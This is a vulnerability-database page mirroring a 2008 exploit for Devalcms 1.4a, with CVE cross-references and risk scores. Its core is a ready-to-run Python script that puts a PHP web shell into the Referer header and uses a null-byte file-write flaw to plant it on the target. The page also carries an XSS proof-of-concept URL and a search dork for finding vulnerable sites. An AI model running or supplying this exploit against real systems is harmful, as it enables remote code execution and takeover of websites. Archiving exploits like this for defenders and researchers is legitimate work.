Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2008-6982 | 5 Sep 200800:00 | – | circl | |
| CVE-2008-6983 | 5 Sep 200800:00 | – | circl | |
| CVE-2008-6982 | 18 Aug 200910:00 | – | cve | |
| CVE-2008-6983 | 18 Aug 200910:00 | – | cve | |
| CVE-2008-6982 | 18 Aug 200910:00 | – | cvelist | |
| CVE-2008-6983 | 18 Aug 200910:00 | – | cvelist | |
| EUVD-2008-6941 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2008-6942 | 7 Oct 202500:30 | – | euvd | |
| Devalcms 1.4a - Cross-Site Scripting | 3 Aug 202604:01 | – | nuclei | |
| CVE-2008-6982 | 19 Aug 200905:24 | – | nvd |
10
#!/usr/bin/python
#####################################################################################
#### devalcms v1.4a Remote Code Execution Exploit / Xss ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://www.sourceforge.net/projects/devalcms #
# #
#DORK : "powered by devalcms v1.4.a" #
# #
#####################################################################################
# [Xss] #
# #
#http://Site/[path]/index.php?currentpath=<script>alert('Xss')</script> #
# #
#####################################################################################
# #
# [Remote Code Execution] #
# #
#Use this exploit for remote code execution valun . #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
import sys,socket
argv=sys.argv
data='<?php include $_GET[\'evil\']; ?>'
query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00'
if len(argv) < 3 :
print '[*]Devalcms v1.4.a Remote code execut exploit'
print '[*]Dork : powered by devalcms v1.4.a'
print '[*]Powered by : R3d.W0rm'
print '[*]Our Site : http://ircrash.com'
print '[*]Usage : ' + argv[0] + ' site /path'
exit()
if 'http://' in argv[1] :
target=argv[1].replace('http://','')
else :
target=argv[1]
if '/' in argv[2] :
path=argv[2]
else :
path='/' + argv[2]
print '[*]Devalcms v1.4.a Remote code execut exploit'
print '[*]Powered by : R3d.W0rm'
print '[*]Our Site : http://ircrash.com'
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target,80))
sock.send("GET " + path + query + " HTTP/1.1\n")
sock.send("Host: " + target + "\n")
sock.send("Referer: " + data + "\n\n\n")
recv=sock.recv(2048)
if 'HTTP/1.1 200 OK' in recv :
print '[+]Code injected .'
print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php'
else :
print '[-]Can not inject code.'
exit()
# milw0rm.com [2008-09-05]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.05786